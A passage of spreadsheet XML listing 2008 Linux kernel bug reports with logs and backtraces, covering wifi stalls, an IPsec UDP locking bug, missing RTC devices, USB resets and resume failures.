    <t>Latest working kernel version: never Earliest failing kernel version: never Distribution: fedora 9 + git kernel Hardware Environment: macbook pro I got strange state of my atheros wifi adapter. After some time of work with wifi connection i got lose route to my lan network. That look like transmission are broken. I can see everything work fine: My wifi connection established, signal strength is good, wifi adapter responding, wifi router responding but i have no packets input/output. Here the state: [axet@axet-laptop ~]$ iwconfig wlan0 wlan0 IEEE 802.11abgn ESSID:"wifi.local" Mode:Managed Frequency:2.412 GHz Access Point: 00:1C:F0:BD:01:06 Bit Rate=1 Mb/s Tx-Power=23 dBm Retry min limit:7 RTS thr:off Fragment thr=2352 B Power Management:off Link Quality=39/100 Signal level:-70 dBm Noise level=-95 dBm Rx invalid nwid:0 Rx invalid crypt:0 Rx invalid frag:0 Tx excessive retries:0 Invalid misc:0 Missed beacon:0 [axet@axet-laptop ~]$ [axet@axet-laptop ~]$ iwlist wlan0 scan wlan0 Scan completed : Cell 01 - Address: 00:1C:F0:BD:01:06 ESSID:"wifi.local" Mode:Master Channel:1 Frequency:2.412 GHz (Channel 1) Quality=54/100 Signal level:-60 dBm Noise level=-95 dBm Encryption key:on IE: IEEE 802.11i/WPA2 Version 1 Group Cipher : CCMP Pairwise Ciphers (1) : CCMP Authentication Suites (1) : PSK Bit Rates:1 Mb/s; 2 Mb/s; 5.5 Mb/s; 11 Mb/s; 6 Mb/s 9 Mb/s; 12 Mb/s; 18 Mb/s; 24 Mb/s; 36 Mb/s 48 Mb/s; 54 Mb/s Extra:tsf=0000002fcc69e1b1 Extra: Last beacon: 97ms ago [axet@axet-laptop ~]$ [axet@axet-laptop ~]$ ifconfig wlan0 wlan0 Link encap:Ethernet HWaddr 00:19:E3:D3:7B:51 inet addr:192.168.54.5 Bcast:192.168.54.255 Mask:255.255.255.0 inet6 addr: fe80::219:e3ff:fed3:7b51/64 Scope:Link UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1 RX packets:221582 errors:0 dropped:0 overruns:0 frame:0 TX packets:201102 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 RX bytes:261861750 (249.7 MiB) TX bytes:22927461 (21.8 MiB) [axet@axet-laptop ~]$ /var/log/messages at problem time: Sep 15 12:34:50 localhost NetworkManager: &lt;info&gt; (wlan0): supplicant connection state change: 7 -&gt; 6 Sep 15 12:34:50 localhost NetworkManager: &lt;info&gt; (wlan0): supplicant connection state change: 6 -&gt; 7 [axet@axet-laptop ~]$ ps aux|grep wpa root 2221 0.0 0.0 5452 1704 ? S 10:10 0:00 /usr/sbin/wpa_supplicant -c /etc/wpa_supplicant/wpa_supplicant.conf -u -f /var/log/wpa_supplicant.log axet 11449 0.0 0.0 5040 700 pts/0 R+ 12:44 0:00 grep wpa [axet@axet-laptop ~]$ /var/log/wpa_supplicant.log Associated with 00:1c:f0:bd:01:06 WPA: Key negotiation completed with 00:1c:f0:bd:01:06 [PTK=CCMP GTK=CCMP] CTRL-EVENT-CONNECTED - Connection to 00:1c:f0:bd:01:06 completed (reauth) [id=0 id_str=] WPA: Group rekeying completed with 00:1c:f0:bd:01:06 [GTK=CCMP] but have no route to host: [axet@axet-laptop ~]$ telnet 192.168.54.1 Trying 192.168.54.1... telnet: connect to address 192.168.54.1: No route to host [axet@axet-laptop ~]$ when i sequentially run ifconfig wlan0, i get only TX packets increace counter, and static RX packets. No errors on dmesg. Normal icon on NetworkManger (gnome) with signal strength. To fix that state i need reconnect to wifi adapter.</t>
  </si>
  <si>
    <t>udp: unbalanced unlock bug in udp_queue_rcv_skb with ipsec</t>
  </si>
  <si>
    <t>2.6.26.4</t>
  </si>
  <si>
    <t>2008-09-15 07:04 UTC</t>
  </si>
  <si>
    <t>2008-09-15 13:32 UTC</t>
  </si>
  <si>
    <t>Hello together, after upgrading our production firewall to kernel 2.6.26.4, it freezed numerous times out of the blue. First problem was isolated and now fixed in bug #11142, but the box still freezed every two days. Yesterday night it crashed during setup of ipsec connections, so I've built a test box setting up over 25 ipsec connections to invalid peers. This will issue the following backtrace: ==================================== [ BUG: bad unlock balance detected! ] ------------------------------------- pluto/2943 is trying to release lock (slock-AF_INET) at: [&lt;c02b660f&gt;] udp_queue_rcv_skb+0xa3/0x210 but there are no more locks to release! other info that might help us debug this: no locks held by pluto/2943. stack backtrace: Pid: 2943, comm: pluto Not tainted 2.6.26-2.i2nsmp #2 [&lt;c013ebb9&gt;] print_unlock_inbalance_bug+0xd7/0xe1 [&lt;c02c73a5&gt;] ? xfrm_sk_policy_lookup+0x44/0x4b [&lt;c02c7d7b&gt;] ? __xfrm_policy_check+0x19b/0x4a2 [&lt;c02b660f&gt;] ? udp_queue_rcv_skb+0xa3/0x210 [&lt;c013ed95&gt;] lock_release+0xad/0x15c [&lt;c02e1056&gt;] _spin_unlock+0x16/0x20 [&lt;c02b660f&gt;] udp_queue_rcv_skb+0xa3/0x210 [&lt;c0279ce0&gt;] release_sock+0x5e/0xab [&lt;c02b75b6&gt;] udp_sendmsg+0x421/0x4d5 [&lt;c02bc186&gt;] inet_sendmsg+0x3b/0x48 [&lt;c02781c0&gt;] sock_sendmsg+0xca/0xe1 [&lt;c0133471&gt;] ? autoremove_wake_function+0x0/0x33 [&lt;c02789f7&gt;] sys_sendto+0xa4/0xc3 [&lt;c02e0fe3&gt;] ? _spin_unlock_irq+0x22/0x2f [&lt;c013d99a&gt;] ? trace_hardirqs_on+0xe9/0x10a [&lt;c02e0fe3&gt;] ? _spin_unlock_irq+0x22/0x2f [&lt;c0279102&gt;] sys_socketcall+0xfb/0x189 [&lt;c0102ffa&gt;] syscall_call+0x7/0xb ======================= And a bit later: BUG: soft lockup - CPU#0 stuck for 61s! [pluto:2943] Modules linked in: authenc xfrm4_mode_tunnel deflate zlib_deflate twofish twofish_common camellia serpent blowfish des_generic cbc aes_i586 aes_generic xcbc sha256_generic crypto_null crypto_blkcid Pid: 2943, comm: pluto Not tainted (2.6.26-2.i2nsmp #2) EIP: 0060:[&lt;c01cb395&gt;] EFLAGS: 00000282 CPU: 0 EIP is at delay_tsc+0x20/0x59 EAX: 535984b0 EBX: 00000000 ECX: 03301000 EDX: 000001d6 ESI: 00000000 EDI: f682e6a4 EBP: f6947cc0 ESP: f6947c94 DS: 007b ES: 007b FS: 00d8 GS: 0000 SS: 0068 CR0: 8005003b CR2: 0016aea0 CR3: 37bd5000 CR4: 000006d0 DR0: 00000000 DR1: 00000000 DR2: 00000000 DR3: 00000000 DR6: ffff0ff0 DR7: 00000400 [&lt;c01cb3e6&gt;] __delay+0x9/0xb [&lt;c01d8c0b&gt;] _raw_spin_lock+0xa7/0x118 [&lt;c02e10ef&gt;] _spin_lock+0x20/0x28 [&lt;c02b6623&gt;] ? udp_queue_rcv_skb+0xb7/0x210 [&lt;c02b6623&gt;] udp_queue_rcv_skb+0xb7/0x210 [&lt;c0279ce0&gt;] release_sock+0x5e/0xab [&lt;c02b75b6&gt;] udp_sendmsg+0x421/0x4d5 [&lt;c02bc186&gt;] inet_sendmsg+0x3b/0x48 [&lt;c02781c0&gt;] sock_sendmsg+0xca/0xe1 [&lt;c0133471&gt;] ? autoremove_wake_function+0x0/0x33 [&lt;c02789f7&gt;] sys_sendto+0xa4/0xc3 [&lt;c02e0fe3&gt;] ? _spin_unlock_irq+0x22/0x2f [&lt;c013d99a&gt;] ? trace_hardirqs_on+0xe9/0x10a [&lt;c02e0fe3&gt;] ? _spin_unlock_irq+0x22/0x2f [&lt;c0279102&gt;] sys_socketcall+0xfb/0x189 [&lt;c0102ffa&gt;] syscall_call+0x7/0xb The locking issue seems to be caused by commit d01885e51bf577745ba935c70b55fe1405d6b632 Author: Herbert Xu &lt;herbert@gondor.apana.org.au&gt; Date: Wed Aug 27 22:40:04 2008 -0700 udp: Drop socket lock for encapsulated packets [ Upstream commit d97106ea52aa57e63ff40d04479016836bbb5a4e ] The socket lock is there to protect the normal UDP receive path. Encapsulation UDP sockets don't need that protection. In fact the locking is deadly for them as they may contain another UDP packet within, possibly with the same addresses. Also the nested bit was copied from TCP. TCP needs it because of accept(2) spawning sockets. This simply doesn't apply to UDP so I've removed it. Signed-off-by: Herbert Xu &lt;herbert@gondor.apana.org.au&gt; Signed-off-by: David S. Miller &lt;davem@davemloft.net&gt; Signed-off-by: Greg Kroah-Hartman &lt;gregkh@suse.de&gt; of kernel 2.6.24.4. The test box freezes after around 30s, so I can easily test any patch and give feedback. Cheers, Thomas</t>
  </si>
  <si>
    <t>MacBook Pro stuck on boot</t>
  </si>
  <si>
    <t>2008-09-16 04:50 UTC</t>
  </si>
  <si>
    <t>2012-05-22 14:00 UTC</t>
  </si>
  <si>
    <t>Hardware Environment: MacBook Pro Software Environment: Fedora 9 Problem Description: halt on boot</t>
  </si>
  <si>
    <t>/dev/rtc entries are not created with 2.6.26+ on HP DL360</t>
  </si>
  <si>
    <t>2.6.26, 2.6.27-rc6</t>
  </si>
  <si>
    <t>2008-09-17 02:04 UTC</t>
  </si>
  <si>
    <t>rik.theys</t>
  </si>
  <si>
    <t>2012-09-05 06:41 UTC</t>
  </si>
  <si>
    <t>Latest working kernel version: 2.6.25 Earliest failing kernel version: 2.6.26 Distribution: Debian Hardware Environment: HP DL360 G5 Software Environment: Debian Lenny amd64 Problem Description: During boot, the rtc-cmos driver is loaded but no rtc devices are created in /dev. The hwclock command does not work as there is no device. When booting older kernels (2.6.18, 2.6.24 and 2.6.25), the devices are created. Also tried 2.6.27-rc6 but still has this issue. Maybe related to https://bugzilla.redhat.com/show_bug.cgi?id=451188 ? System is an HP DL360 G5. Steps to reproduce: 1. boot a 2.6.26+ kernel 2. notice that rtc-cmos is loaded in kernel messages 3. notice that no rtcX device is created in /dev</t>
  </si>
  <si>
    <t>Frequent USB resets when writing to flash of Mio GPS</t>
  </si>
  <si>
    <t>2008-09-17 15:12 UTC</t>
  </si>
  <si>
    <t>Tamas Kerecsen</t>
  </si>
  <si>
    <t>2009-02-05 17:01 UTC</t>
  </si>
  <si>
    <t>Latest working kernel version: unknown Earliest failing kernel version: unknown Distribution: ubuntu Hardware Environment: Asus P5B mobo, Core2Duo Software Environment: n/a Problem Description: I have a Mio C520 GPS device (ARM/WinCE 5.0-based), which has an internal flash storage, and an SD card slot. Both the internal flash and SD card appear as USB mass storage drives when the device is connected to the PC. When I try to copy files to either the internal flash or the card in the SD slot, I get very poor performance and the log is filled with ehci_hcd USB resets. If I remount the device with the 'sync' flag, the errors go away, but the performance is sub-par (700 kbyte/s write speed instead of 3000 observed on windows). The same device with the same computer works perfectly under Windows. Using the same SD card in a different SD reader on the same computer works both on Windows and Linux. So this appears to be an incompatibility between the device and Linux. Steps to reproduce: 1. connect the Mio device to the PC 2. copy a large file 3. observe the transfer speed -&gt; copying the file takes minutes instead of seconds 4. observe dmesg output -&gt; usb reset errors</t>
  </si>
  <si>
    <t>kernel boot pauses unless "idle=poll" - HP Pavilion dv6950la - AMD Turion TL-62</t>
  </si>
  <si>
    <t>2008-09-18 06:52 UTC</t>
  </si>
  <si>
    <t>Luis Diaz</t>
  </si>
  <si>
    <t>2008-09-23 19:41 UTC</t>
  </si>
  <si>
    <t>Latest working kernel version: 2.6.24-21 (Ubuntu) Distribution: Ubuntu 8.04 Hardware Environment: Pavilion dv6950la Software Environment: Problem Description: the kernel pauses during boot and when i press the power button continues without problems.... This is a vanilla kernel, but i found the same bug on Ubuntu bug system: https://bugs.launchpad.net/ubuntu/+source/linux/+bug/254668 I see exactly the same: [ 0.548741] ACPI: EC: Look up EC in DSDT [ 0.551266] ACPI: BIOS _OSI(Linux) query ignored via DMI [ 0.552031] ACPI: Interpreter enabled [ 0.552031] ACPI: (supports S0 S3 S4 S5) [ 0.552281] ACPI: Using IOAPIC for interrupt routing [ 0.556031] ACPI: EC: non-query interrupt received, switching to interrupt mo de press/release power button (thinking i need to hard reboot) and it continues booting: [ 0.572281] ACPI: EC: GPE = 0x10, I/O: command/status = 0x66, data = 0x62 [ 0.572281] ACPI: EC: driver started in interrupt mode (continues normally)..... I also enabled ADCPI debug without succed.... However im also my own fixed DSDT, but the problem persists.... if you wanna take a look here is my edited DSDT: http://drop.io/dsdtdv6950 Steps to reproduce: compile your own 2.6.26 kernel and boot it</t>
  </si>
  <si>
    <t>zd1211rw add device ID</t>
  </si>
  <si>
    <t>latest git head</t>
  </si>
  <si>
    <t>2008-09-18 08:58 UTC</t>
  </si>
  <si>
    <t>born.into.silence</t>
  </si>
  <si>
    <t>2008-09-23 13:44 UTC</t>
  </si>
  <si>
    <t>Nokia 5310 Xpress usb-storage not mounting</t>
  </si>
  <si>
    <t>2008-09-18 21:35 UTC</t>
  </si>
  <si>
    <t>David Almaroad</t>
  </si>
  <si>
    <t>2008-09-26 05:48 UTC</t>
  </si>
  <si>
    <t>Latest working kernel version: 2.6.26 Earliest failing kernel version: 2.6.27-rc6 Distribution: Ubuntu Hardware Environment: Software Environment: Problem Description: Attaching a Nokia 5310 Xpress phone in usb-storage mode fails (reports one more sector that is on sd card.) Steps to reproduce: Connect Nokia 5310 Xpress phone in usb-storage mode. I have a patch for unusual_devs.h and compiled with a vanilla 2.6.27-rc6 kernel it resolves the problem.</t>
  </si>
  <si>
    <t>Asus EeePC shuts down while booting reporting bogus 144C temperature.</t>
  </si>
  <si>
    <t>2008-09-19 12:47 UTC</t>
  </si>
  <si>
    <t>Robert Epprecht</t>
  </si>
  <si>
    <t>2008-10-16 13:11 UTC</t>
  </si>
  <si>
    <t>This bug is a regression. Things worked well in 2.6.25 and 2.6.24 kernels. Earliest failing kernel version: http://git.kernel.org/?p=linux/kernel/git/torvalds/linux-2.6.git;a=commit;h=1b7fc5aae8867046f8d3d45808309d5b7f2e036a Distribution: Debian Lenny using vanilla 2.6.26.3 kernel (also affects Debian 2.6.26 kernels) Hardware Environment: Asus Eee PC model 701 (reported on model 900 too) Software Environment: Debian Lenny Problem Description: During boot process the system reports a bogus temperature of 144C and shuts down, making it impossible to boot from battery. ACPI: Critical trip point Critical temperature reached (144 C), shutting down. See also http://bugs.debian.org/494984 Steps to reproduce: The bug shows most often (but not always) when booting from a battery which is slightly de-charged. Most of the time it is *not* possible to boot under these conditions, but sometimes everything works well (even a few times in a row, which makes it hard to track down). When on ac-adapter the bug is rarely seen. Using git bisect I have found commit 1b7fc5aae8867046f8d3d45808309d5b7f2e036a to introduce the problem The problem gets fixed with the following change: http://git.kernel.org/?p=linux/kernel/git/torvalds/linux-2.6.git;a=commit;h=9d699ed92a459cb408e2577e8bbeabc8ec3989e1 I have tried this two line change with kernel 2.6.26.3, where it works well. Please apply this patch to the stable kernel tree. Robert Epprecht</t>
  </si>
  <si>
    <t>iwlagn driver in latest linux-2.6 git is not working for intel 4965agn card</t>
  </si>
  <si>
    <t>linux-2.6 git</t>
  </si>
  <si>
    <t>2008-09-20 00:51 UTC</t>
  </si>
  <si>
    <t>2008-11-18 16:13 UTC</t>
  </si>
  <si>
    <t>Latest working kernel version: Linux-2.6git (~linux-2.6.27-rc6) Earliest failing kernel version: unknown Distribution: Vanilla Hardware Environment: Intel 4965agn card Software Environment: Problem Description: Although my wifi card is detected, and although it is able to scan for access points, it is not able to connect to access points. I tried two access points (one with WPA2 encryption and another without encryption). Authentication is successful but then it seems like it is not able to get an IP from DHCP... DHCP server is working fine and forcing an IP does not work (I'm not able to ping other machines on the wlan). I first noticed this problem on Ubuntu intrepid, which is using 2.6.27-rc6. Then, I decided to compile linux-2.6 git and enable iwlagn debug. I'm joining my logs. I'll be happy to provide more information if necessary. Steps to reproduce: Connect to any access point, authentication is successful but you can't get any IP.</t>
  </si>
  <si>
    <t>zte mf622 (device ignored)</t>
  </si>
  <si>
    <t>2.6.26, 2.6.27, 2.6.28</t>
  </si>
  <si>
    <t>2008-09-20 05:54 UTC</t>
  </si>
  <si>
    <t>cthx</t>
  </si>
  <si>
    <t>2009-06-30 12:39 UTC</t>
  </si>
  <si>
    <t>Latest working kernel version: 2.6.25 (?) Earliest failing kernel version: 2.6.26.2 Distribution: Archlinux Hardware Environment: Software Environment: Problem Description: modem shoud be detected as cdrom, but i see this: usb 2-2: new full speed USB device using uhci_hcd and address 4 hub 2-0:1.0: unable to enumerate USB device on port 2 usb 2-2: new full speed USB device using uhci_hcd and address 5 usb 2-2: configuration #1 chosen from 1 choice usb-storage: device ignored on fedora 8 (2.6.25.14): usb 2-6: new full speed USB device using ohci_hcd and address 105 usb 2-6: configuration #1 chosen from 1 choice scsi18 : SCSI emulation for USB Mass Storage devices usb 2-6: New USB device found, idVendor=19d2, idProduct=2000 usb 2-6: New USB device strings: Mfr=1, Product=2, SerialNumber=0 usb 2-6: Product: USB ZTE Storage usb 2-6: Manufacturer: Qualcomm, Incorporated usb-storage: device found at 105 usb-storage: waiting for device to settle before scanning usb-storage: device scan complete scsi 18:0:0:0: CD-ROM ZTE Corp USB Storage 2.31 PQ: 0 ANSI: 2 sr1: scsi-1 drive sr 18:0:0:0: Attached scsi CD-ROM sr1 sr 18:0:0:0: Attached scsi generic sg2 type 5</t>
  </si>
  <si>
    <t>cdrom drive cannot open the tray, but reported this badly in /proc/sys/dev/cdrom/info</t>
  </si>
  <si>
    <t>2008-09-20 10:58 UTC</t>
  </si>
  <si>
    <t>2008-10-05 01:30 UTC</t>
  </si>
  <si>
    <t>Latest working kernel version: Earliest failing kernel version: Distribution: Debian Hardware Environment: Clevo D410J + Optiarc DVD RW AD-7543A Software Environment: Problem Description: The "Optiarc DVD RW AD-7543A" DVD-ROM drive is a slim drive and cannot close the tray automatically once it was opened. I applied a debug patch to drivers/ide/ide-cd.c to 2.6.27-rc6 which prints out that the drive reports correctly that it cannot colose the tray: [ 12.133887] drivers/ide/ide-cd.c:1664: mechtype=1 [ 12.133892] drivers/ide/ide-cd.c:1669: cdrom CANNOT close the tray [ 12.133895] hdc: ATAPI 24X DVD-ROM DVD-R-RAM CD-R/RW drive, 2048kB Cache [ 12.134224] drivers/ide/ide-cd.c:1922: cdi-&gt;mask=0x40010, (cdi-&gt;mask &amp; CDC_CLOSE_TRAY)=FALSE [ 12.134229] drivers/cdrom/cdrom.c:396: cdi-&gt;mask=0x40010, (cdi-&gt;mask &amp; CDC_CLOSE_TRAY)=FALSE [ 12.134232] Uniform CD-ROM driver Revision: 3.20 [ 12.134288] drivers/cdrom/cdrom.c:410: cdi-&gt;mask=0x40010, (cdi-&gt;mask &amp; CDC_CLOSE_TRAY)=FALSE [ 12.134291] drivers/cdrom/cdrom.c:413: cdi-&gt;mask=0x40010, (cdi-&gt;mask &amp; CDC_CLOSE_TRAY)=FALSE [ 12.134296] drivers/cdrom/cdrom.c:447: cdi-&gt;mask=0x40010, (cdi-&gt;mask &amp; CDC_CLOSE_TRAY)=FALSE However, when the "/proc/sys/dev/cdrom/info" is examined from the userspace, the "Can close tray" field becomes "1" (expected: "0"). $ cat /proc/sys/dev/cdrom/info CD-ROM information, Id: cdrom.c 3.20 2003/12/17 drive name: hdc drive speed: 24 drive # of slots: 1 Can close tray: 1 Can open tray: 1 Can lock tray: 1 Can change speed: 1 Can select disk: 0 Can read multisession: 1 Can read MCN: 1 Reports media changed: 1 Can play audio: 1 Can write CD-R: 1 Can write CD-RW: 1 Can read DVD: 1 Can write DVD-R: 1 Can write DVD-RAM: 1 Can read MRW: 1 Can write MRW: 1 Can write RAM: 1 $ cat /proc/ide/hdc/model Optiarc DVD RW AD-7543A Steps to reproduce: 1. Boot the system 2. cat /proc/sys/dev/cdrom/info</t>
  </si>
  <si>
    <t>Commit 2344abbcbdb82140050e8be29d3d55e4f6fe860b breaks resume on nx6325</t>
  </si>
  <si>
    <t>commit 2344abbcbdb82140050e8be29d3d55e4f6fe860b</t>
  </si>
  <si>
    <t>2008-09-21 12:51 UTC</t>
  </si>
  <si>
    <t>2008-09-26 16:06 UTC</t>
  </si>
  <si>
    <t>Subject : Commit 2344abbcbdb82140050e8be29d3d55e4f6fe860b breaks resume on nx6325 Submitter : "Rafael J. Wysocki" &lt;rjw@sisk.pl&gt; Date : 2008-09-20 23:24 References : http://marc.info/?l=linux-kernel&amp;m=122195277606974&amp;w=4 This entry is being used for tracking a regression from 2.6.26. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>quad G5 fails to shut down</t>
  </si>
  <si>
    <t>2.6.27-rc6+wireless bits</t>
  </si>
  <si>
    <t>2008-09-23 14:20 UTC</t>
  </si>
  <si>
    <t>2008-10-04 15:20 UTC</t>
  </si>
  <si>
    <t>Latest working kernel version: don't remember, pretty sure 2.6.26 worked but have been running development kernels forever Earliest failing kernel version: n/a, haven't checked, has been failing for a while Distribution: debian/unstable Hardware Environment: quad G5 powermac Software Environment: ? Problem Description: machine fails to shut down, Steps to reproduce: shut down the machine, see it fail. http://johannes.sipsolutions.net/files/dsc_2274.jpg</t>
  </si>
  <si>
    <t>Kernel panic after patch f3994eceebf64cf356a82ffb2718ef538eb8d4f4</t>
  </si>
  <si>
    <t>&gt;=2.6.26</t>
  </si>
  <si>
    <t>2008-09-23 20:05 UTC</t>
  </si>
  <si>
    <t>Jérémie Dimino</t>
  </si>
  <si>
    <t>2008-10-27 11:58 UTC</t>
  </si>
  <si>
    <t>Latest working kernel version: 2.6.25 Earliest failing kernel version: 2.6.26 Distribution: debian Hardware Environment: laptop Software Environment: Problem Description: I have a laptop with an intel 3945 wireless card and i am using an ipsec tunnel on my wireless network. Since the 2.6.26 version of the kernel, i have a lot of kernel panic when i use my wifi connection. I have tried with the latest development version and still have the same problem. After a bisection, i found that this start with the patch f3994eceebf64cf356a82ffb2718ef538eb8d4f4. If a revert this patch, everything is OK. Steps to reproduce: connection to the wireless network, activation of the ipsec tunnel (everything seems to be OK without it), scp a file, wait about 10 seconds and it panics</t>
  </si>
  <si>
    <t>Sometime my laptop is dead on resume from ram</t>
  </si>
  <si>
    <t>2008-09-24 01:12 UTC</t>
  </si>
  <si>
    <t>2008-10-24 23:16 UTC</t>
  </si>
  <si>
    <t>Latest working kernel version: 2.6.26.2 Earliest failing kernel version: 2.6.27-rc Distribution: ubuntu 8.04 Hardware Environment: toshiba satellite U305-S5077 (lspci and boot dmesg will be attached right away) Software Environment: doing native (by menu) suspend/resume Problem Description: sometime resume from ram fails, giving a completely dead machine. Nothing works, not even SysRq-B. Nothing is left in the logs. It happens maybe every 7-9 correct resume events. It never happened in 2.6.26 (then it had problems with video not resuming, but this was another kind of problem). Problem is hardly bisectable... The main difference could be the fact that now I have ath5k.ko driver instead of ndiswrapper for the wireless, but I have no proof whatsoever that the wireless could be the culprit. I can try to run with ndiswrapper instead a couple of day, but I'm not sure this is the correct strategy. Any hints?</t>
  </si>
  <si>
    <t>dm-snapshot or kcopyd Oops</t>
  </si>
  <si>
    <t>2008-09-24 02:41 UTC</t>
  </si>
  <si>
    <t>skysky</t>
  </si>
  <si>
    <t>2009-10-26 11:47 UTC</t>
  </si>
  <si>
    <t>Mikulas Patocka</t>
  </si>
  <si>
    <t>Latest working kernel version: 2.6.26 Earliest failing kernel version: 2.6.19 Distribution: Redhat enterprise version 5 Software Environment: kernel version: 2.6.26 LVM2 version: 2.02.16-RHEL5 device-mapper version: 1.02.13 Problem Description: I'm now running Redhat 5, with a few disks under md (RAID5), LVM on top of that, formatted ext3,and shared by Samba for a Windows XP client . When snapshots are in use, large file transfers (transfers of large files, or transfers of many smaller ones) from WinXP client to Samba, kernel panic. Oops is as next.Disabling snapshots eliminates the behavior. Oops: BUG: unable to handle kernel paging request at 00200200 IP: [&lt;c04e6468&gt;] list_del+0x4/0x4d *pdpt = 0000000022173001 *pde = 0000000000000000 Oops: 0000 [#1] SMP Modules linked in: autofs4 hidp rfcomm l2cap bluetooth sunrpc ipv6 sbs sbshc battery ac parport_pc lp parport sg e1000 ide_cd_mod cdrom button serio_raw rtc_cmos rtc_core i2c_i801 rtc_lib i2c_core pcspkr dm_snapshot dm_zero dm_mirror dm_log dm_mod megaraid_sas sd_mod scsi_mod ext3 jbd ehci_hcd ohci_hcd uhci_hcd [last unloaded: microcode] Pid: 2366, comm: kcopyd Not tainted (2.6.26 #1) EIP: 0060:[&lt;c04e6468&gt;] EFLAGS: 00010246 CPU: 7 EIP is at list_del+0x4/0x4d EAX: e117d4c8 EBX: e106c5d8 ECX: 00200200 EDX: e106c668 ESI: e117d4c8 EDI: f3558ac0 EBP: f300eb00 ESP: efc35f0c DS: 007b ES: 007b FS: 00d8 GS: 0000 SS: 0068 Process kcopyd (pid: 2366, ti=efc35000 task=f34d24c0 task.ti=efc35000) Stack: e106c5d8 f88c7b3e 00000000 00000000 00000000 0000006e 00000370 f300eb00 f88c882e 02f2823a 00000000 00c0ac2d 00000000 ec03ad08 f3558ac0 ec03ad08 f38c28c0 f88c7c0e ec03ad08 f3589058 00000000 f88d2e16 00000000 f88c7be6 Call Trace: [&lt;f88c7b3e&gt;] pending_complete+0x80/0x128 [dm_snapshot] [&lt;f88c882e&gt;] persistent_commit+0xdc/0xf0 [dm_snapshot] [&lt;f88c7c0e&gt;] copy_callback+0x28/0x2c [dm_snapshot] [&lt;f88d2e16&gt;] run_complete_job+0x46/0x6f [dm_mod] [&lt;f88c7be6&gt;] copy_callback+0x0/0x2c [dm_snapshot] [&lt;f88d2c55&gt;] process_jobs+0x1f/0x99 [dm_mod] [&lt;f88d2dd0&gt;] run_complete_job+0x0/0x6f [dm_mod] [&lt;f88d2ccf&gt;] do_work+0x0/0x38 [dm_mod] [&lt;f88d2ce5&gt;] do_work+0x16/0x38 [dm_mod] [&lt;c042fc05&gt;] run_workqueue+0x6b/0xe0 [&lt;c0430282&gt;] worker_thread+0x0/0xbd [&lt;c0430335&gt;] worker_thread+0xb3/0xbd [&lt;c043247c&gt;] autoremove_wake_function+0x0/0x2d [&lt;c04323ba&gt;] kthread+0x38/0x5e [&lt;c0432382&gt;] kthread+0x0/0x5e [&lt;c0404463&gt;] kernel_thread_helper+0x7/0x10 ======================= Code: e5 8d 4b 04 8b 51 04 8d 46 04 e8 65 00 00 00 8d 4b 0c 8b 51 04 8d 46 0c 5b 5e 5f e9 54 00 00 00 89 c3 eb eb 90 90 90 53 8b 48 04 &lt;8b&gt; 11 39 c2 74 13 52 50 68 1d 3e 69 c0 e8 43 db f3 ff 0f 0b 83 EIP: [&lt;c04e6468&gt;] list_del+0x4/0x4d SS:ESP 0068:efc35f0c ---[ end trace 3e64353a09c5d9e6 ]--- Maybe bug is in dm-snapshot or kcopyd thread code segment when exception is deleted. is it right? how to fix? thanks in advance.</t>
  </si>
  <si>
    <t>resume fails with CONFIG_NO_HZ</t>
  </si>
  <si>
    <t>2.6..26.5</t>
  </si>
  <si>
    <t>2008-09-24 07:48 UTC</t>
  </si>
  <si>
    <t>bitshifter</t>
  </si>
  <si>
    <t>2008-10-05 02:22 UTC</t>
  </si>
  <si>
    <t>Latest working kernel version: Unknown Earliest failing kernel version: Unknown Distribution: Slackware (current) Hardware Environment: Lenovo Thinkpad T61 Software Environment: Problem Description: As a base kernel config I am using http://dotimes.com/download/config-t61 With that configuration, if I turn CONFIG_NO_HZ on resume fails leaving me with a blinking half moon and a flashing text mode cursor in the upper left hand part of the screen. Steps to reproduce: make oldconfig with the mentioned kernel configuration saying yes to all 1 question. make menuconfig - turn on the tickless kernel feature make and install s2ram -f -a3 perform some interrupt to wake the computer (eg press Fn key) What other information is needed/desired for this bug? What steps can I do to help debug this?</t>
  </si>
  <si>
    <t>Usb stick mounts only once, upon writing non readable next connect.</t>
  </si>
  <si>
    <t>2.4.x -&gt; 2.6.x -&gt; 2.6.27-rc7 ( most if not all )</t>
  </si>
  <si>
    <t>2008-09-24 09:04 UTC</t>
  </si>
  <si>
    <t>Latest working kernel version: none Earliest failing kernel version: all Distribution: most Hardware Environment: intel/powerpc Software Environment: Problem Description: Usb stick can be attached only once to linux system to be bricked for all linux systems. While being bricked for linux systems, the stick still works for windows macosx. Steps to reproduce: Buy a stick based on prolific Vendor: 0x067b, Product: 0x2528, Revision: 0x0100 such as the Adata PD16. Insert in any linux system, mount read files write files to stick, repartition, sync, unmount everything nicely according to rules, then extract the stick. Now reinsert the stick, stick becomes unusable in linux, however stick works perfect under windows and macosx.</t>
  </si>
  <si>
    <t>qla2xxx.ko can't load firmware binary code</t>
  </si>
  <si>
    <t>2008-09-25 03:54 UTC</t>
  </si>
  <si>
    <t>2008-09-26 07:03 UTC</t>
  </si>
  <si>
    <t>Seokmann Ju</t>
  </si>
  <si>
    <t>Multiple virtual ACPI backlight devices created for a single LCD</t>
  </si>
  <si>
    <t>2008-09-25 11:39 UTC</t>
  </si>
  <si>
    <t>Mario Limonciello</t>
  </si>
  <si>
    <t>2008-11-17 00:31 UTC</t>
  </si>
  <si>
    <t>Distribution: Ubuntu 8.10 Hardware Environment: Dell Inspiron 1420, XPS M1330, Inspiron 1525 Problem Description: It appears that the DSDT from these machines is causing multiple virtual backlight devices to get created in /sys. Likely this is because the DSDT will work both with the discrete and uma case. Steps to reproduce: Browse /sys tree for directory containing backlight devices. Observe that multiple backlight devices exist and are functional.</t>
  </si>
  <si>
    <t>rtl8150 module does not unload when interface is up</t>
  </si>
  <si>
    <t>2008-09-25 13:52 UTC</t>
  </si>
  <si>
    <t>2012-05-22 14:36 UTC</t>
  </si>
  <si>
    <t>using stock kernel.org 2.6.26.5 on a Dell Latitude D820 laptop (running Gentoo, but shouldnt matter). i'm using a RTL8150 USB NIC with the driver built as a module: ID 0bda:8150 Realtek Semiconductor Corp. RTL8150 Fast Ethernet Adapter if you load the module, then bring up the interface by doing something simple like `ifconfig eth1 192.168.0.1`, then do `rmmod rtl8150`, the driver goes to lunch and forgets to come back. top shows ksoftirqd processing a lot and rmmod using 100% cpu. trying to strace rmmod shows nothing, so something in the kernel is processing a lot on its behalf ...</t>
  </si>
  <si>
